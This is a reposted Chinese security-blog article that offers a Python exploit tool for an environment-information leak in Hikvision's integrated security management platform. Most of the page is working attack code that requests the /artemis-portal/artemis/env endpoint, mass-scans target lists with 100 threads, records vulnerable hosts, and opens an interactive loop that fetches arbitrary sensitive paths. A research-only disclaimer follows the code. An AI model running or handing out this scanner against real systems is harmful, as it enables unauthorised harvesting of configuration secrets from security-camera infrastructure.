HIKVISION -- 综合安防管理平台env信息泄漏

admin
admin
admin
138985
文章
114
评论
2024年7月26日13:50:40评论46 views字数 1752阅读5分50秒阅读模式

0x01 工具介绍

综合安防管理平台env信息泄漏。

0x02 安装与使用

界面展示

HIKVISION -- 综合安防管理平台env信息泄漏

0x03 下载链接

import argparse,requests,sys,re,os,time  # 导包
from multiprocessing.dummy import Pool  # 导入多线程
requests.packages.urllib3.disable_warnings()  # 过滤报错


def banner():
    text = """██╗  ██╗██╗██╗  ██╗██╗   ██╗██╗███████╗██╗ ██████╗ ███╗   ██╗
██║  ██║██║██║ ██╔╝██║   ██║██║██╔════╝██║██╔═══██╗████╗  ██║
███████║██║█████╔╝ ██║   ██║██║███████╗██║██║   ██║██╔██╗ ██║
██╔══██║██║██╔═██╗ ╚██╗ ██╔╝██║╚════██║██║██║   ██║██║╚██╗██║
██║  ██║██║██║  ██╗ ╚████╔╝ ██║███████║██║╚██████╔╝██║ ╚████║
╚═╝  ╚═╝╚═╝╚═╝  ╚═╝  ╚═══╝  ╚═╝╚══════╝╚═╝ ╚═════╝ ╚═╝  ╚═══╝
                                                             
                                          version = 1.0.0                          
"""
    print(text)


def main():
    banner()
    parser = argparse.ArgumentParser(description="HiKVISION综合安防管理平台env信息泄漏")  # 定义脚本信息
    parser.add_argument('-u','--url',type=str,dest='url',help='please input your url')  # 定义参数
    parser.add_argument('-f', '--file', type=str, dest='file', help='please input your file')
    args = parser.parse_args()
    if args.url and not args.file:  # 单个url
        if poc(args.url):
            exp(args.url)
    elif args.file and not args.url:  # 多线程
        file_url = []
        with open(args.file,'r',encoding='utf-8') as fp:  # 读取输入的文件
            for url in fp.readlines():
                file_url.append(url.strip())
        mp = Pool(100)
        mp.map(poc,file_url)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")


def poc(target):
    payload = '/artemis-portal/artemis/env'
    try:
        res = requests.get(url=target+payload,verify=False,timeout=10)  # get发送请求
        if res.status_code == 200:  # 判断返回状态码是否为200
            if 'profiles' in res.text:  # 判断是否存在漏洞
                print(f'[+]{target}存在漏洞')
                with open('result.txt', 'a') as fp:  # 将漏洞写入到文件中
                    fp.write(target + '\n')
            else:
                print(f'[-]{target}不存在漏洞')
            return True
    except:
        print('该站点存在问题')

def exp(target):
    while True:
        cmd = input("请输入你要获取的敏感信息路径")
        payload1 = '/artemis-portal/artemis/'+cmd
        if cmd == 'q':
            exit()
        res1 = requests.get(url=target+payload1,verify=False,timeout=10)  # 发送请求并返回结果
        print(res1.text)


if __name__ == "__main__":
    main()
 

HIKVISION -- 综合安防管理平台env信息泄漏

 

原文始发于微信公众号(网络安全者):HIKVISION -- 综合安防管理平台env信息泄漏(7月20日更新)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月26日13:50:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HIKVISION -- 综合安防管理平台env信息泄漏https://cn-sec.com/archives/2987630.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息